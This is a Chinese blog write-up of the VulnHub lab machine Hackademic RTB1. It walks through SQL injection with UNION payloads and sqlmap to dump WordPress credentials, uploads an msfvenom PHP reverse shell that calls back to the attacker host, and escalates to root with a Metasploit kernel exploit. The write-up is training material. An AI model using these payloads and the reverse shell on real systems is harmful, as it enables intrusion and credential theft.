侧边栏壁纸
  • 累计撰写 19 篇文章
  • 累计创建 18 个标签
  • 累计收到 10 条评论

vulnhub-Hackademic.RTB1

小海
2023-02-21 / 0 评论 / 2 点赞 / 685 阅读 / 7,679 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2023-02-23,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

一、靶机信息

Name: Hackademic: RTB1(中等难度)
Date release: 6 Sep 2011
Author: mr.pr0n
Series: Hackademic
靶机IP:192.168.33.130

二、信息收集

1、端口扫描

nmap -sV 192.168.33.130 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-21 07:18 EST
Nmap scan report for 192.168.33.130
Host is up (0.00021s latency).
Not shown: 988 filtered tcp ports (no-response), 10 filtered tcp ports (host-prohibited)
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:B9:22:10 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.47 seconds
开放了22端口;80端口上运行的是Apache httpd 2.2.15的服务,并且目标系统是Fedora

2、打开web界面在http://192.168.33.130/Hackademic_RTB1/?cat=1这个地方发现了sql注入
image.png
3、目录扫描

并没有发现啥可用信息
  _|. _ _  _  _  _ _|_    v0.4.2.6                                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                                      
                                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11347

Output File: /root/Desktop/目录扫描/dirsearch/reports/192.168.33.130/__23-02-21_19-14-24.txt

Target: http://192.168.33.130/

[19:14:24] Starting:                                                                                                                                                         
[19:14:25] 403 -  293B  - /.ht_wsr.txt                                      
[19:14:25] 403 -  296B  - /.htaccess.bak1                                   
[19:14:25] 403 -  296B  - /.htaccess_orig
[19:14:25] 403 -  296B  - /.htaccess.save
[19:14:25] 403 -  298B  - /.htaccess.sample
[19:14:25] 403 -  296B  - /.htaccess.orig
[19:14:25] 403 -  294B  - /.htaccessOLD
[19:14:25] 403 -  294B  - /.htaccess_sc                                     
[19:14:25] 403 -  286B  - /.htm
[19:14:25] 403 -  287B  - /.html
[19:14:25] 403 -  295B  - /.htaccessOLD2
[19:14:25] 403 -  297B  - /.htaccess_extra
[19:14:25] 403 -  296B  - /.htpasswd_test
[19:14:25] 403 -  293B  - /.httr-oauth
[19:14:25] 403 -  292B  - /.htpasswds                                       
[19:14:25] 403 -  294B  - /.htaccessBAK
[19:14:33] 403 -  290B  - /cgi-bin/                                         
[19:14:36] 403 -  288B  - /error/                                           
[19:14:38] 200 -    1KB - /index.html                                       
[19:14:42] 403 -  292B  - /phpMyAdmin                                       
[19:14:42] 403 -  292B  - /phpmyadmin                                       
[19:14:43] 403 -  293B  - /phpmyadmin/                                      
[19:14:43] 403 -  293B  - /phpMyAdmin/
[19:14:43] 403 -  313B  - /phpmyadmin/docs/html/index.html
[19:14:43] 403 -  302B  - /phpmyadmin/ChangeLog
[19:14:43] 403 -  302B  - /phpmyadmin/index.php
[19:14:43] 403 -  312B  - /phpmyadmin/doc/html/index.html                   
[19:14:43] 403 -  310B  - /phpMyAdmin/scripts/setup.php
[19:14:43] 403 -  313B  - /phpMyAdmin/phpMyAdmin/index.php
[19:14:43] 403 -  313B  - /phpmyadmin/phpmyadmin/index.php                  
[19:14:43] 403 -  299B  - /phpmyadmin/README
[19:14:43] 403 -  310B  - /phpmyadmin/scripts/setup.php
[19:14:43] 403 -  302B  - /phpMyAdmin/index.php                             
                                                                             
Task Completed 


换目录继续扫得到wp_login.php,发现是后台登录地址
─# python dirsearch.py -u http://192.168.33.130/Hackademic_RTB1/

  _|. _ _  _  _  _ _|_    v0.4.2.6                                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                                      
                                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11347

Output File: /root/Desktop/目录扫描/dirsearch/reports/192.168.33.130/_Hackademic_RTB1__23-02-21_19-17-57.txt

Target: http://192.168.33.130/Hackademic_RTB1/

[19:17:57] Starting:                                                                                                                                                         
[19:17:58] 403 -  309B  - /Hackademic_RTB1/.ht_wsr.txt                      
[19:17:58] 403 -  314B  - /Hackademic_RTB1/.htaccess.sample                 
[19:17:58] 403 -  312B  - /Hackademic_RTB1/.htaccess.bak1
[19:17:58] 403 -  312B  - /Hackademic_RTB1/.htaccess_orig
[19:17:58] 403 -  312B  - /Hackademic_RTB1/.htaccess.save
[19:17:58] 403 -  310B  - /Hackademic_RTB1/.htaccessOLD
[19:17:58] 403 -  311B  - /Hackademic_RTB1/.htaccessOLD2
[19:17:58] 403 -  312B  - /Hackademic_RTB1/.htaccess.orig
[19:17:58] 403 -  313B  - /Hackademic_RTB1/.htaccess_extra                  
[19:17:58] 403 -  310B  - /Hackademic_RTB1/.htaccessBAK
[19:17:58] 403 -  303B  - /Hackademic_RTB1/.html
[19:17:58] 403 -  302B  - /Hackademic_RTB1/.htm
[19:17:58] 403 -  308B  - /Hackademic_RTB1/.htpasswds
[19:17:58] 403 -  309B  - /Hackademic_RTB1/.httr-oauth
[19:17:58] 403 -  312B  - /Hackademic_RTB1/.htpasswd_test
[19:17:58] 403 -  310B  - /Hackademic_RTB1/.htaccess_sc                     
[19:18:11] 500 -    2KB - /Hackademic_RTB1/index.php                        
[19:18:11] 404 -    2KB - /Hackademic_RTB1/index.php/login/                 
[19:18:12] 200 -   15KB - /Hackademic_RTB1/license.txt                      
[19:18:17] 200 -    9KB - /Hackademic_RTB1/readme.html                      
[19:18:24] 301 -  335B  - /Hackademic_RTB1/wp-admin  ->  http://192.168.33.130/Hackademic_RTB1/wp-admin/
[19:18:24] 200 -  184B  - /Hackademic_RTB1/wp-admin/setup-config.php        
[19:18:24] 200 -    0B  - /Hackademic_RTB1/wp-config.php                    
[19:18:24] 200 -    1KB - /Hackademic_RTB1/wp-admin/install.php
[19:18:24] 302 -    0B  - /Hackademic_RTB1/wp-admin/  ->  /Hackademic_RTB1/wp-login.php?redirect_to=%2FHackademic_RTB1%2Fwp-admin%2F
[19:18:24] 200 -    1KB - /Hackademic_RTB1/wp-content/                      
[19:18:24] 301 -  337B  - /Hackademic_RTB1/wp-content  ->  http://192.168.33.130/Hackademic_RTB1/wp-content/
[19:18:24] 500 -    0B  - /Hackademic_RTB1/wp-content/plugins/hello.php     
[19:18:24] 301 -  338B  - /Hackademic_RTB1/wp-includes  ->  http://192.168.33.130/Hackademic_RTB1/wp-includes/
[19:18:24] 200 -    0B  - /Hackademic_RTB1/wp-includes/rss-functions.php    
[19:18:24] 200 -    6KB - /Hackademic_RTB1/wp-includes/
[19:18:24] 200 -    1KB - /Hackademic_RTB1/wp-login.php                     
[19:18:24] 200 -    2KB - /Hackademic_RTB1/wp.php                           
[19:18:24] 200 -    1KB - /Hackademic_RTB1/wp-register.php
[19:18:24] 200 -   42B  - /Hackademic_RTB1/xmlrpc.php  

三、SQL注入

http://192.168.33.130/Hackademic_RTB1/?cat=1进行SQL注入测试

http://192.168.33.130/Hackademic_RTB1/?cat=1 order by 5 得到列数
http://192.168.33.130/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3,4,5 得到数据库

sqlmap一把梭哈

└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" --dbs --batch                 
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" --D wordpress --tables --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch
└─# sqlmap -u "http://192.168.33.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --dump --batch   

最后得到用户数据为
|序号|密码|用户名|
|-------|-------|-------|
|1|admin|NickJames|
|2|kernel|MaxBucky|
|3|maxwell|JasonKonnors|
|4|napoleon|TonyBlack|
|5|q1w2e3|GeorgeMiller|

三、GetShell

尝试使用刚刚爆破出来的账号密码进行登录,最后发现GeorgeMiller拥有配置的权限。在Options->Miscellaneous可添加PHP在upload上传马子
image.png
生成PHP马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.33.129 lport=6789 -f raw > ./shell.php

开启监听
image.png
访问上传之后的地址即可上线
image.png
查看内核版本是2.6.3
image.png

提权

msf6 > search 2.6.3

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/windows/http/hp_mpa_job_acct                 2011-12-21       excellent  Yes    HP Managed Printing Administration jobAcct Remote Command Execution
   1  exploit/linux/local/sock_sendpage                    2009-08-13       great      Yes    Linux Kernel Sendpage Local Privilege Escalation
   2  exploit/linux/local/rds_rds_page_copy_user_priv_esc  2010-10-20       great      Yes    Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation
   3  auxiliary/admin/http/telpho10_credential_dump        2016-09-02       normal     No     Telpho10 Backup Credentials Dumper


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/admin/http/telpho10_credential_dump

msf6 > use exploit/linux/local/rds_rds_page_copy_user_priv_esc 
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lport 6789
lport => 6789
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > set lhost 192.168.33.129
lhost => 192.168.33.129
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run
msf6 exploit(linux/local/rds_rds_page_copy_user_priv_esc) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: php
[*] Started reverse TCP handler on 192.168.33.129:6789 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.w2iBkASs' (235 bytes) ...
[*] Launching exploit...
[*] Sending stage (1017704 bytes) to 192.168.33.130
[*] Meterpreter session 2 opened (192.168.33.129:6789 -> 192.168.33.130:56310) at 2023-02-21 20:03:55 -0500
meterpreter > shell 
Process 4879 created.
Channel 1 created.
whoami
root
ls
plugins
shell.php
themes
cd /
ls
bin
boot
dev
etc
home
lib
lost+found
media
mnt
opt
proc
root
sbin
selinux
srv
sys
tmp
usr
var
cd /root
ls
Desktop
anaconda-ks.cfg
key.txt
key.txt~
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)

$_d&jgQ>>ak\#b"(Hx"o<la_%

Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com

image.png

四、总计

这次攻击路径是从sql注入漏洞入手,爆出了数据库中账户密码,并然后进行目录扫描发现后台登陆地址,寻找上传点上传反弹shell文件获得shell,最后利用linux内核进行了提权。接下来应该将sqlmap仔细研究一下,并着重练习一下提权姿势。

2

评论区